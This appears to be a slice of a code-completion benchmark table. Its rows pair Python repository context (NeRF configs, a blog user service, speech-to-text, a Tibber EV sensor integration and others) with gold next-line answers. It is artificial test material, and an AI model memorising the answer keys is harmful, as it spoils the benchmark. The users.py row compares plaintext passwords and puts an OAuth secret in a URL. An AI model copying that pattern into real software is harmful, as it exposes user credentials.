repo_name stringlengths 7 71 | file_path stringlengths 5 118 | context list | import_statement stringlengths 45 12.5k | token_num int64 641 99.4k | cropped_code stringlengths 44 17k | all_code stringlengths 43 754k | next_line stringlengths 2 330 | gold_snippet_index int64 0 68 | created_at stringlengths 25 25 | level stringclasses 9 values |
|---|---|---|---|---|---|---|---|---|---|---|
WU-CVGL/BAD-NeRFstudio | badnerf/badnerf_method_config.py | [
{
"identifier": "BadNerfCameraOptimizerConfig",
"path": "badnerf/cameras/badnerf_camera_optimizer.py",
"snippet": "class BadNerfCameraOptimizerConfig(InstantiateConfig):\n \"\"\"Configuration of BAD-NeRF camera optimizer.\"\"\"\n\n _target: Type = field(default_factory=lambda: BadNerfCameraOptimiz... | from nerfstudio.configs.base_config import ViewerConfig
from nerfstudio.engine.optimizers import AdamOptimizerConfig
from nerfstudio.engine.schedulers import ExponentialDecaySchedulerConfig
from nerfstudio.plugins.types import MethodSpecification
from badnerf.cameras.badnerf_camera_optimizer import BadNerfCameraOptimizerConfig
from badnerf.data.badnerf_datamanager import BadNerfDataManagerConfig
from badnerf.data.badnerf_dataparser import BadNerfDataParserConfig
from badnerf.engine.badnerf_trainer import BadNerfTrainerConfig
from badnerf.models.badnerfacto import BadNerfactoModelConfig
from badnerf.pipelines.badnerf_pipeline import BadNerfPipelineConfig | 902 | """
BAD-NeRF config.
"""
badnerf_nerfacto = MethodSpecification(
config=BadNerfTrainerConfig(
method_name="bad-nerfacto",
steps_per_eval_all_images=500,
steps_per_save=2000,
max_num_iterations=30001,
mixed_precision=False,
use_grad_scaler=True,
| """
BAD-NeRF config.
"""
badnerf_nerfacto = MethodSpecification(
config=BadNerfTrainerConfig(
method_name="bad-nerfacto",
steps_per_eval_all_images=500,
steps_per_save=2000,
max_num_iterations=30001,
mixed_precision=False,
use_grad_scaler=True, | pipeline=BadNerfPipelineConfig( | 5 | 2023-11-10 07:40:22+00:00 | 2k |
nttcom/WASB-SBDT | src/runners/train_and_test.py | [
{
"identifier": "BaseRunner",
"path": "src/runners/base.py",
"snippet": "class BaseRunner:\n def __init__(\n self,\n cfg: DictConfig,\n ):\n self._cfg = cfg\n log.info('run {}'.format(self._cfg['runner']['name']))\n self._output_dir = cfg['output_dir']\n\... | import os
import os.path as osp
import shutil
import time
import logging
import hydra
import numpy as np
import torch
from tqdm import tqdm
from omegaconf import DictConfig, OmegaConf
from hydra.core.hydra_config import HydraConfig
from torch import nn
from models import build_model
from dataloaders import build_dataloader
from losses import build_loss_criteria
from optimizers import build_optimizer_and_scheduler
from utils import save_checkpoint, set_seed, mkdir_if_missing, count_params, AverageMeter
from .inference_videos import VideosInferenceRunner
from .base import BaseRunner
from .runner_utils import train_epoch, test_epoch | 889 |
log = logging.getLogger(__name__)
def update_fp1_example(epoch,
model,
vi_runner,
fp1_fpath,
):
vi_results = vi_runner.run(model=model)
print(vi_results['fp1_im_list_dict'])
print(fp1_fpath)
fp1_im_list_dict = vi_results['fp1_im_list_dict']
with open(fp1_fpath, 'w') as f:
for key, im_list in fp1_im_list_dict.items():
for path in im_list:
f.write('{}\n'.format(path))
fp1_fpath_current = osp.splitext(fp1_fpath)[0] + '_{}.txt'.format(epoch)
shutil.copyfile(fp1_fpath, fp1_fpath_current)
|
log = logging.getLogger(__name__)
def update_fp1_example(epoch,
model,
vi_runner,
fp1_fpath,
):
vi_results = vi_runner.run(model=model)
print(vi_results['fp1_im_list_dict'])
print(fp1_fpath)
fp1_im_list_dict = vi_results['fp1_im_list_dict']
with open(fp1_fpath, 'w') as f:
for key, im_list in fp1_im_list_dict.items():
for path in im_list:
f.write('{}\n'.format(path))
fp1_fpath_current = osp.splitext(fp1_fpath)[0] + '_{}.txt'.format(epoch)
shutil.copyfile(fp1_fpath, fp1_fpath_current)
| class Trainer(BaseRunner): | 0 | 2023-11-15 02:11:00+00:00 | 2k |
barkure/white-dove-backend | services/users.py | [
{
"identifier": "SessionLocal",
"path": "db.py",
"snippet": "DATABASE_URL = \"sqlite:///./data.db\""
},
{
"identifier": "Users",
"path": "models.py",
"snippet": "class Users(Base):\n __tablename__ = \"Users\"\n\n # fields\n user_id = Column(Integer,primary_key=True, index=True)... | from datetime import timedelta
from db import SessionLocal
from models import Users, BlogSettings
from services.auth_utils import create_access_token
from config import GITHUB_CLIENT_ID, GITHUB_CLIENT_SECRET, ACCESS_TOKEN_EXPIRE_MINUTES
import requests | 1,295 | "email": user.email,
"GitHub_id": user.GitHub_id
}
else:
return ["User not found"]
# 更新用户
def update_user(payload: dict):
user_id = payload.get("user_id")
userName = payload.get("userName")
password = payload.get("password")
email = payload.get("email")
GitHub_id = payload.get("GitHub_id")
db = SessionLocal()
user = db.query(Users).filter(Users.user_id == user_id).first()
if user:
if userName is not None:
user.userName = userName
if password is not None:
user.password = password
if email is not None:
user.email = email
if GitHub_id is not None:
user.GitHub_id = GitHub_id
db.commit()
db.close()
return {
"update_yes": True,
}
else:
db.close()
return {
"update_yes": False,
}
# 删除用户
def delete_user(payload: dict):
user_id = payload.get("user_id")
db = SessionLocal()
user = db.query(Users).filter(Users.user_id == user_id).first()
if user:
db.delete(user)
db.commit()
db.close()
return "User deleted"
else:
db.close()
return "User not found"
# 查询所有用户
def get_all_users():
db = SessionLocal()
all_users = db.query(Users).all()
db.close()
user_list = []
for user in all_users:
user_dict = {
"user_id": user.user_id,
"userName": user.userName,
"email": user.email,
"GitHub_id": user.GitHub_id
}
user_list.append(user_dict)
return user_list
# 登录验证
def login(payload: dict):
userNameOrEmail = payload.get("userNameOrEmail")
password = payload.get("password")
db = SessionLocal()
user = db.query(Users).filter((Users.userName == userNameOrEmail) | (Users.email == userNameOrEmail)).first()
db.close()
if user:
if user.password == password:
access_token_expires = timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES)
access_token = create_access_token(data={"sub": user.userName}, expires_delta=access_token_expires)
return {
"login_yes": True,
"token": access_token,
"userName": user.userName,
"email": user.email,
"user_id": user.user_id,
"GitHub_id": user.GitHub_id
}
else:
return {
"login_yes": False,
"token": None,
}
else:
return {
"login_yes": False,
"token": None,
}
# 绑定 GitHub 账号
def bind_github(GitHub_id: str, user_id: int):
db = SessionLocal()
user = db.query(Users).filter(Users.user_id == user_id).first()
if user:
user.GitHub_id = GitHub_id
db.commit()
db.close()
return {
"bind_yes": True,
"GitHub_id": GitHub_id,
}
else:
db.close()
return {
"bind_yes": False,
}
# Github OAuth
def github_oauth(payload: dict):
code = payload.get("code")
user_id = payload.get("user_id")
operation = payload.get("operation") # 根据 operation 判断是登录还是绑定
print('Code:', code, 'Operation:', operation)
|
# 添加用户
def create_user(payload: dict):
userName = payload.get("userName")
password = payload.get("password")
email = payload.get("email")
db = SessionLocal()
new_user = Users(userName=userName, password=password, email=email)
db.add(new_user)
db.commit()
db.close()
return "User created"
# 查询用户
def get_user(payload: dict):
user_id = payload.get("user_id")
db = SessionLocal()
user = db.query(Users).filter(Users.user_id == user_id).first()
db.close()
if user:
return {
"user_id": user.user_id,
"userName": user.userName,
"email": user.email,
"GitHub_id": user.GitHub_id
}
else:
return ["User not found"]
# 更新用户
def update_user(payload: dict):
user_id = payload.get("user_id")
userName = payload.get("userName")
password = payload.get("password")
email = payload.get("email")
GitHub_id = payload.get("GitHub_id")
db = SessionLocal()
user = db.query(Users).filter(Users.user_id == user_id).first()
if user:
if userName is not None:
user.userName = userName
if password is not None:
user.password = password
if email is not None:
user.email = email
if GitHub_id is not None:
user.GitHub_id = GitHub_id
db.commit()
db.close()
return {
"update_yes": True,
}
else:
db.close()
return {
"update_yes": False,
}
# 删除用户
def delete_user(payload: dict):
user_id = payload.get("user_id")
db = SessionLocal()
user = db.query(Users).filter(Users.user_id == user_id).first()
if user:
db.delete(user)
db.commit()
db.close()
return "User deleted"
else:
db.close()
return "User not found"
# 查询所有用户
def get_all_users():
db = SessionLocal()
all_users = db.query(Users).all()
db.close()
user_list = []
for user in all_users:
user_dict = {
"user_id": user.user_id,
"userName": user.userName,
"email": user.email,
"GitHub_id": user.GitHub_id
}
user_list.append(user_dict)
return user_list
# 登录验证
def login(payload: dict):
userNameOrEmail = payload.get("userNameOrEmail")
password = payload.get("password")
db = SessionLocal()
user = db.query(Users).filter((Users.userName == userNameOrEmail) | (Users.email == userNameOrEmail)).first()
db.close()
if user:
if user.password == password:
access_token_expires = timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES)
access_token = create_access_token(data={"sub": user.userName}, expires_delta=access_token_expires)
return {
"login_yes": True,
"token": access_token,
"userName": user.userName,
"email": user.email,
"user_id": user.user_id,
"GitHub_id": user.GitHub_id
}
else:
return {
"login_yes": False,
"token": None,
}
else:
return {
"login_yes": False,
"token": None,
}
# 绑定 GitHub 账号
def bind_github(GitHub_id: str, user_id: int):
db = SessionLocal()
user = db.query(Users).filter(Users.user_id == user_id).first()
if user:
user.GitHub_id = GitHub_id
db.commit()
db.close()
return {
"bind_yes": True,
"GitHub_id": GitHub_id,
}
else:
db.close()
return {
"bind_yes": False,
}
# Github OAuth
def github_oauth(payload: dict):
code = payload.get("code")
user_id = payload.get("user_id")
operation = payload.get("operation") # 根据 operation 判断是登录还是绑定
print('Code:', code, 'Operation:', operation) | resp1 = requests.post("https://github.com/login/oauth/access_token?"+"client_id="+GITHUB_CLIENT_ID+"&client_secret="+GITHUB_CLIENT_SECRET+"&code="+code, headers={"Accept": "application/json"}) | 4 | 2023-11-11 04:46:58+00:00 | 2k |
BobaZooba/xllm-demo | xllm_demo/core/registry.py | [
{
"identifier": "DATASET_KEY",
"path": "xllm_demo/core/constants.py",
"snippet": "DATASET_KEY = \"antropic\""
},
{
"identifier": "COLLATOR_KEY",
"path": "xllm_demo/core/constants.py",
"snippet": "COLLATOR_KEY = \"last_part\""
},
{
"identifier": "TRAINER_KEY",
"path": "xllm_de... | from xllm.datasets import datasets_registry
from xllm.collators import collators_registry
from xllm.trainers import trainers_registry
from xllm.experiments import experiments_registry
from xllm_demo.core.constants import DATASET_KEY, COLLATOR_KEY, TRAINER_KEY, EXPERIMENT_KEY
from xllm_demo.core.dataset import AntropicDataset
from xllm_demo.core.experiment import MyExperiment
from xllm_demo.core.collator import LastPartCollator
from xllm_demo.core.trainer import MyLMTrainer | 1,238 | # Copyright 2023 Boris Zubarev. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def components_registry():
datasets_registry.add(key=DATASET_KEY, value=AntropicDataset)
collators_registry.add(key=COLLATOR_KEY, value=LastPartCollator)
trainers_registry.add(key=TRAINER_KEY, value=MyLMTrainer)
| # Copyright 2023 Boris Zubarev. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def components_registry():
datasets_registry.add(key=DATASET_KEY, value=AntropicDataset)
collators_registry.add(key=COLLATOR_KEY, value=LastPartCollator)
trainers_registry.add(key=TRAINER_KEY, value=MyLMTrainer) | experiments_registry.add(key=EXPERIMENT_KEY, value=MyExperiment) | 3 | 2023-11-10 17:56:14+00:00 | 2k |
Kiyliy/openai_speech_to_text | openai_audio.py | [
{
"identifier": "send_to_openai_api",
"path": "send_to_openai.py",
"snippet": "def send_to_openai_api(api_key,url,audio_file_path)->str:\n print(\"DEBUD: api_key:\",api_key)\n if not api_key or not url:\n raise ValueError(\"API密钥和URL必须设置\")\n headers = {\n 'Authorization': f'Beare... | import pyaudio
import wave
import requests
import json
import base64
import pyautogui
import threading
import logging
import pyperclip
import os
import random
import time
import get_api_key
from threading import Lock
from send_to_openai import send_to_openai_api , paste_text | 923 |
logging.basicConfig(level=logging.INFO)
# 确保在模块加载时调用load_config
get_api_key.load_config()
# API和URL变量
api_key = get_api_key.get_api_key()
url = get_api_key.get_api_url()
# 录音参数
chunk = 1024
format = pyaudio.paInt16
channels = 1
rate = 44100
# 录音控制变量
is_recording = False
frames = []
frames_lock = Lock()
def start_recording():
global is_recording
with frames_lock:
if not is_recording:
is_recording = True
frames.clear()
threading.Thread(target=record).start()
else:
logging.info("录音已在进行中。")
def stop_recording():
global is_recording
with frames_lock:
if is_recording:
is_recording = False
else:
logging.info("录音已停止。")
def record():
global frames
logging.info("录音开始...")
p = pyaudio.PyAudio()
stream = p.open(format=format, channels=channels, rate=rate, input=True, frames_per_buffer=chunk)
try:
while is_recording:
data = stream.read(chunk)
with frames_lock:
frames.append(data)
except Exception as e:
logging.error(f"录音过程中出错: {e}")
finally:
stream.stop_stream()
stream.close()
p.terminate()
logging.info("录音结束...")
save_recording(frames, p)
def save_recording(frames, audio):
wf = wave.open('temp_audio.wav', 'wb')
wf.setnchannels(channels)
wf.setsampwidth(audio.get_sample_size(format))
wf.setframerate(rate)
wf.writeframes(b''.join(frames))
wf.close()
api_key = get_api_key.get_api_key()
transcription= send_to_openai_api(api_key,url,'temp_audio.wav')
|
logging.basicConfig(level=logging.INFO)
# 确保在模块加载时调用load_config
get_api_key.load_config()
# API和URL变量
api_key = get_api_key.get_api_key()
url = get_api_key.get_api_url()
# 录音参数
chunk = 1024
format = pyaudio.paInt16
channels = 1
rate = 44100
# 录音控制变量
is_recording = False
frames = []
frames_lock = Lock()
def start_recording():
global is_recording
with frames_lock:
if not is_recording:
is_recording = True
frames.clear()
threading.Thread(target=record).start()
else:
logging.info("录音已在进行中。")
def stop_recording():
global is_recording
with frames_lock:
if is_recording:
is_recording = False
else:
logging.info("录音已停止。")
def record():
global frames
logging.info("录音开始...")
p = pyaudio.PyAudio()
stream = p.open(format=format, channels=channels, rate=rate, input=True, frames_per_buffer=chunk)
try:
while is_recording:
data = stream.read(chunk)
with frames_lock:
frames.append(data)
except Exception as e:
logging.error(f"录音过程中出错: {e}")
finally:
stream.stop_stream()
stream.close()
p.terminate()
logging.info("录音结束...")
save_recording(frames, p)
def save_recording(frames, audio):
wf = wave.open('temp_audio.wav', 'wb')
wf.setnchannels(channels)
wf.setsampwidth(audio.get_sample_size(format))
wf.setframerate(rate)
wf.writeframes(b''.join(frames))
wf.close()
api_key = get_api_key.get_api_key()
transcription= send_to_openai_api(api_key,url,'temp_audio.wav') | paste_text(transcription) | 1 | 2023-11-11 09:28:31+00:00 | 2k |
globality-corp/deboiler | deboiler/models/page.py | [
{
"identifier": "logger",
"path": "deboiler/logger.py",
"snippet": "def logger(obj):\n \"\"\"\n logging decorator, assigning an object the `logger` property.\n Can be used on a Python class, e.g:\n @logger\n class MyClass:\n ...\n \"\"\"\n\n obj.logger = logging.g... | import re
from dataclasses import dataclass
from io import StringIO
from logging import Logger
from typing import Optional, Union
from lxml.etree import HTMLParser, _Element, parse as parse_html
from deboiler.logger import logger
from deboiler.lxml_query import get_candidate_nodes
from deboiler.models.lxml_node import LxmlTree | 981 |
EMPTY_HTML = "<html></html>"
@dataclass
class RawPage:
"""
A crawled page with raw (string or binary) content.
"""
url: str
content: Union[bytes, str]
def __repr__(self):
return f"RawPage(url={self.url}, content={self.content[:20]}...)"
def parse(self):
return ParsedPage(self.url, self.content)
@logger
class ParsedPage:
"""
A parsed page.
It stores the parsed version (as an LxmlTree) of the given raw content.
nodes attribute is a cache of string representations for all the candidate nodes (subtrees)
in this page.
"""
logger: Logger
parser = HTMLParser(remove_comments=True)
def __init__(self, url: str, content: Union[bytes, str]):
self.url = url
self.content: LxmlTree = self.parse(content)
self.nodes: set[str] = {
# Set of normalized representations for all candidate nodes in the LxmlTree
node.normalized_representation()
|
EMPTY_HTML = "<html></html>"
@dataclass
class RawPage:
"""
A crawled page with raw (string or binary) content.
"""
url: str
content: Union[bytes, str]
def __repr__(self):
return f"RawPage(url={self.url}, content={self.content[:20]}...)"
def parse(self):
return ParsedPage(self.url, self.content)
@logger
class ParsedPage:
"""
A parsed page.
It stores the parsed version (as an LxmlTree) of the given raw content.
nodes attribute is a cache of string representations for all the candidate nodes (subtrees)
in this page.
"""
logger: Logger
parser = HTMLParser(remove_comments=True)
def __init__(self, url: str, content: Union[bytes, str]):
self.url = url
self.content: LxmlTree = self.parse(content)
self.nodes: set[str] = {
# Set of normalized representations for all candidate nodes in the LxmlTree
node.normalized_representation() | for node in get_candidate_nodes(self.content) | 1 | 2023-11-17 23:11:45+00:00 | 2k |
solovieff/kibernikto | kibernikto/plugins/_weblink_summarizator.py | [
{
"identifier": "_is_image",
"path": "kibernikto/plugins/_img_summarizator.py",
"snippet": "def _is_image(url):\n parsed = urlparse(url)\n path = parsed.path\n\n # Get the file extension from the path\n ext = os.path.splitext(path)[1].lower()\n\n # Check if the extension is a known image ... | import logging
import re
from kibernikto.plugins._img_summarizator import _is_image
from openai.types.chat import ChatCompletion
from kibernikto.constants import OPENAI_MAX_TOKENS
from kibernikto.utils.text import get_website_as_text, get_website_html
from ._kibernikto_plugin import KiberniktoPlugin, KiberniktoPluginException | 914 |
class WeblinkSummaryPlugin(KiberniktoPlugin):
"""
This plugin is used to get video transcript and then get text summary from it.
"""
def __init__(self, model: str, base_url: str, api_key: str, summarization_request: str):
super().__init__(model=model, base_url=base_url, api_key=api_key, post_process_reply=False, store_reply=True,
base_message=summarization_request)
async def run_for_message(self, message: str):
try:
result = await self._run(message)
return result
except Exception as error:
logging.error(f'failed to get webpage data from {message}: {str(error)}', )
raise KiberniktoPluginException(plugin_name=self.__class__.__name__,
error_message='failed to get webpage data')
async def _run(self, message: str):
web_link, other_text = _extract_link(message)
if web_link is None:
return None
|
class WeblinkSummaryPlugin(KiberniktoPlugin):
"""
This plugin is used to get video transcript and then get text summary from it.
"""
def __init__(self, model: str, base_url: str, api_key: str, summarization_request: str):
super().__init__(model=model, base_url=base_url, api_key=api_key, post_process_reply=False, store_reply=True,
base_message=summarization_request)
async def run_for_message(self, message: str):
try:
result = await self._run(message)
return result
except Exception as error:
logging.error(f'failed to get webpage data from {message}: {str(error)}', )
raise KiberniktoPluginException(plugin_name=self.__class__.__name__,
error_message='failed to get webpage data')
async def _run(self, message: str):
web_link, other_text = _extract_link(message)
if web_link is None:
return None
| if _is_image(web_link): | 0 | 2023-11-11 18:39:28+00:00 | 2k |
leeyuentuen/tibber_ev | custom_components/tibber_ev/sensor.py | [
{
"identifier": "MAX_CHARGE_RANGE",
"path": "custom_components/tibber_ev/const.py",
"snippet": "MAX_CHARGE_RANGE = 375"
},
{
"identifier": "TibberEVEntity",
"path": "custom_components/tibber_ev/entity.py",
"snippet": "class TibberEVEntity(Entity):\n\n def __init__(self, device: Tibber... | import logging
from typing import Final
from dataclasses import dataclass
from datetime import timedelta
from .const import MAX_CHARGE_RANGE
from .entity import TibberEVEntity
from homeassistant.helpers.typing import StateType
from homeassistant import const
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant, callback
from homeassistant.components.sensor import (
SensorEntity,
SensorEntityDescription,
SensorStateClass,
SensorDeviceClass
)
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers import entity_platform
from . import DOMAIN as TIBBER_EV_DOMAIN
from .tibber import Tibber, TibberApi
from homeassistant.const import (
PERCENTAGE,
) | 1,577 | path="battery",
subpath="percent",
unit=PERCENTAGE,
round_digits=None,
state_class=SensorStateClass.MEASUREMENT,
device_class=SensorDeviceClass.BATTERY,
),
TibberSensorDescription(
key="battery_charge_limit",
name="battery charge limit",
icon="mdi:battery-plus-variant",
path="battery",
subpath="chargeLimit",
unit=PERCENTAGE,
round_digits=None,
state_class=SensorStateClass.TOTAL,
device_class=SensorDeviceClass.BATTERY,
),
TibberSensorDescription(
key="last_seen",
name="last seen",
icon="mdi:eye",
path="lastSeen",
subpath=None,
unit=None,
round_digits=None,
state_class=SensorStateClass.MEASUREMENT,
device_class=SensorDeviceClass.TIMESTAMP,
),
TibberSensorDescription(
key="last_seen_text",
name="last seen text",
icon="mdi:eye",
path="lastSeenText",
subpath=None,
unit=None,
round_digits=None,
),
TibberSensorDescription(
key="is_charging",
name="is charging",
icon="mdi:battery-charging",
path="battery",
subpath="isCharging",
unit=None,
round_digits=None,
),
TibberSensorDescription(
key="shortName",
name="shortname",
icon="mdi:rename-outline",
path="shortName",
subpath=None,
unit=None,
round_digits=None,
),
TibberSensorDescription(
key="full_name",
name="full name",
icon="mdi:car",
path="name",
subpath=None,
unit=None,
round_digits=None,
),
TibberSensorDescription(
key="is_alive",
name="Is alive",
icon="mdi:shield-account",
path="isAlive",
subpath=None,
unit=None,
round_digits=None,
),
TibberSensorDescription(
key="schedule",
name="schedule",
icon="mdi:battery-clock",
path="schedule",
subpath=None,
unit=None,
round_digits=None,
),
TibberSensorDescription(
key="id",
name="id",
icon="mdi:car",
path="id",
subpath=None,
unit=None,
round_digits=None,
),
TibberSensorDescription(
key="range",
name="Range",
icon="mdi:map-marker-distance",
path=None,
subpath=None,
unit="km",
round_digits=0,
state_class=SensorStateClass.MEASUREMENT,
device_class=SensorDeviceClass.DISTANCE,
),
)
async def async_setup_platform(
hass: HomeAssistant,
config: ConfigEntry,
async_add_entities: AddEntitiesCallback,
discovery_info=None):
pass
async def async_setup_entry(
hass: HomeAssistant,
entry: ConfigEntry,
async_add_entities: AddEntitiesCallback):
"""Set up using config_entry."""
# get the device
|
_LOGGER = logging.getLogger(__name__)
SCAN_INTERVAL = timedelta(seconds=15)
@dataclass
class TibberSensorDescriptionMixin:
"""Define an entity description mixin for sensor entities."""
path: str
subpath: str | None
unit: str
round_digits: int | None
unit: str | None
@dataclass
class TibberSensorDescription(
SensorEntityDescription, TibberSensorDescriptionMixin
):
"""Class to describe an Tibber sensor entity."""
TIBBER_SENSOR_TYPES: Final[tuple[TibberSensorDescription, ...]] = (
TibberSensorDescription(
key="battery_soc",
name="battery soc",
path="battery",
subpath="percent",
unit=PERCENTAGE,
round_digits=None,
state_class=SensorStateClass.MEASUREMENT,
device_class=SensorDeviceClass.BATTERY,
),
TibberSensorDescription(
key="battery_charge_limit",
name="battery charge limit",
icon="mdi:battery-plus-variant",
path="battery",
subpath="chargeLimit",
unit=PERCENTAGE,
round_digits=None,
state_class=SensorStateClass.TOTAL,
device_class=SensorDeviceClass.BATTERY,
),
TibberSensorDescription(
key="last_seen",
name="last seen",
icon="mdi:eye",
path="lastSeen",
subpath=None,
unit=None,
round_digits=None,
state_class=SensorStateClass.MEASUREMENT,
device_class=SensorDeviceClass.TIMESTAMP,
),
TibberSensorDescription(
key="last_seen_text",
name="last seen text",
icon="mdi:eye",
path="lastSeenText",
subpath=None,
unit=None,
round_digits=None,
),
TibberSensorDescription(
key="is_charging",
name="is charging",
icon="mdi:battery-charging",
path="battery",
subpath="isCharging",
unit=None,
round_digits=None,
),
TibberSensorDescription(
key="shortName",
name="shortname",
icon="mdi:rename-outline",
path="shortName",
subpath=None,
unit=None,
round_digits=None,
),
TibberSensorDescription(
key="full_name",
name="full name",
icon="mdi:car",
path="name",
subpath=None,
unit=None,
round_digits=None,
),
TibberSensorDescription(
key="is_alive",
name="Is alive",
icon="mdi:shield-account",
path="isAlive",
subpath=None,
unit=None,
round_digits=None,
),
TibberSensorDescription(
key="schedule",
name="schedule",
icon="mdi:battery-clock",
path="schedule",
subpath=None,
unit=None,
round_digits=None,
),
TibberSensorDescription(
key="id",
name="id",
icon="mdi:car",
path="id",
subpath=None,
unit=None,
round_digits=None,
),
TibberSensorDescription(
key="range",
name="Range",
icon="mdi:map-marker-distance",
path=None,
subpath=None,
unit="km",
round_digits=0,
state_class=SensorStateClass.MEASUREMENT,
device_class=SensorDeviceClass.DISTANCE,
),
)
async def async_setup_platform(
hass: HomeAssistant,
config: ConfigEntry,
async_add_entities: AddEntitiesCallback,
discovery_info=None):
pass
async def async_setup_entry(
hass: HomeAssistant,
entry: ConfigEntry,
async_add_entities: AddEntitiesCallback):
"""Set up using config_entry."""
# get the device | tibberApi: TibberApi | 3 | 2023-11-14 18:59:47+00:00 | 2k |
bytedance/LapNet | lapnet/configs/benzene_dimer/benzene_dimer.py | [
{
"identifier": "base_config",
"path": "lapnet/base_config.py",
"snippet": "class SystemType(enum.IntEnum):\n MOLECULE = enum.auto()\n def has_value(cls, value):\ndef default() -> ml_collections.ConfigDict:\ndef resolve(cfg):"
},
{
"identifier": "system",
"path": "lapnet/utils/system.py",
... | from lapnet import base_config
from lapnet.utils import system
from lapnet.utils.system import Atom | 1,044 | # Copyright 2023 Bytedance Ltd. and/or its affiliate
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Settings in a a config files are loaded by executing the the get_config
# function.
# Geometry of Benzene sigle molecule is from https://pubs.acs.org/doi/10.1021/acs.jpclett.0c02621,
# which is at the MP2/6-31G* level.
def get_config(input_str):
'''
Return config for benzene dimer with different bond lenth.
Using input_str to set the bond length,
e.g. --config lapnet/configs/benzene_dimer/benzene_dimer.py:4.95
'''
r_str= input_str
r = float(r_str)
# Get default options.
| # Copyright 2023 Bytedance Ltd. and/or its affiliate
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Settings in a a config files are loaded by executing the the get_config
# function.
# Geometry of Benzene sigle molecule is from https://pubs.acs.org/doi/10.1021/acs.jpclett.0c02621,
# which is at the MP2/6-31G* level.
def get_config(input_str):
'''
Return config for benzene dimer with different bond lenth.
Using input_str to set the bond length,
e.g. --config lapnet/configs/benzene_dimer/benzene_dimer.py:4.95
'''
r_str= input_str
r = float(r_str)
# Get default options. | cfg = base_config.default() | 0 | 2023-11-13 08:19:53+00:00 | 2k |
svetlovtech/gptize | gptize/gptizer.py | [
{
"identifier": "File",
"path": "gptize/models.py",
"snippet": "class File:\n \"\"\"Class representing a file in the project.\"\"\"\n def __init__(self, file_name: str, directory: str):\n self.file_name = file_name\n self.directory = directory\n self.content = \"\"\n se... | import logging
import os
import pathspec
from .models import File, Project
from .settings import Settings
from .output_builder import OutputBuilder | 1,396 |
class GPTizer:
def __init__(self):
self._project = None
self._gitignore = None
def process_directory(self, root_path: str):
"""
Processes all the files within a given directory. This method initializes
the Project object for the specified directory, loads the .gitignore patterns,
and populates the project with files that are not ignored by .gitignore.
The method traverses through the directory recursively and adds all relevant
files to the project's file list, ensuring that binary files and files
specified in .gitignore are not included.
Parameters:
root_path (str): The path to the root of the directory to be processed.
Raises:
FileNotFoundError: If the specified directory does not exist.
Exception: For any other issues encountered during the directory processing.
"""
project_name = os.path.basename(root_path)
self._project = Project(project_name, root_path)
self._gitignore = self.load_gitignore(root_path)
self.populate_files()
def process_file(self, file_path: str):
"""
Processes a single file. This method creates a Project object for the file,
treating the file as an individual project. It bypasses .gitignore processing,
as it is assumed that the specific file is intentionally selected for processing.
The method creates a File object for the specified file, reads its content,
and adds it to the project's file list. It handles binary and text files
accordingly.
Parameters:
file_path (str): The path to the file to be processed. This includes both
the directory path and file name.
Raises:
FileNotFoundError: If the specified file does not exist.
IOError: If there is an issue reading the file.
Exception: For any other unexpected issues encountered during file processing.
"""
root_path, file_name = os.path.split(file_path)
project_name = os.path.basename(root_path) if root_path else 'SingleFileProject'
self._project = Project(project_name, root_path or '.')
self._gitignore = pathspec.PathSpec.from_lines('gitwildmatch', [])
|
class GPTizer:
def __init__(self):
self._project = None
self._gitignore = None
def process_directory(self, root_path: str):
"""
Processes all the files within a given directory. This method initializes
the Project object for the specified directory, loads the .gitignore patterns,
and populates the project with files that are not ignored by .gitignore.
The method traverses through the directory recursively and adds all relevant
files to the project's file list, ensuring that binary files and files
specified in .gitignore are not included.
Parameters:
root_path (str): The path to the root of the directory to be processed.
Raises:
FileNotFoundError: If the specified directory does not exist.
Exception: For any other issues encountered during the directory processing.
"""
project_name = os.path.basename(root_path)
self._project = Project(project_name, root_path)
self._gitignore = self.load_gitignore(root_path)
self.populate_files()
def process_file(self, file_path: str):
"""
Processes a single file. This method creates a Project object for the file,
treating the file as an individual project. It bypasses .gitignore processing,
as it is assumed that the specific file is intentionally selected for processing.
The method creates a File object for the specified file, reads its content,
and adds it to the project's file list. It handles binary and text files
accordingly.
Parameters:
file_path (str): The path to the file to be processed. This includes both
the directory path and file name.
Raises:
FileNotFoundError: If the specified file does not exist.
IOError: If there is an issue reading the file.
Exception: For any other unexpected issues encountered during file processing.
"""
root_path, file_name = os.path.split(file_path)
project_name = os.path.basename(root_path) if root_path else 'SingleFileProject'
self._project = Project(project_name, root_path or '.')
self._gitignore = pathspec.PathSpec.from_lines('gitwildmatch', [])
| file_obj = File(file_name, file_path) | 0 | 2023-11-11 20:59:01+00:00 | 2k |
civrealm/civrealm | src/civrealm/envs/freeciv_wrapper/tensor_base_wrapper.py | [
{
"identifier": "Wrapper",
"path": "src/civrealm/envs/freeciv_wrapper/core.py",
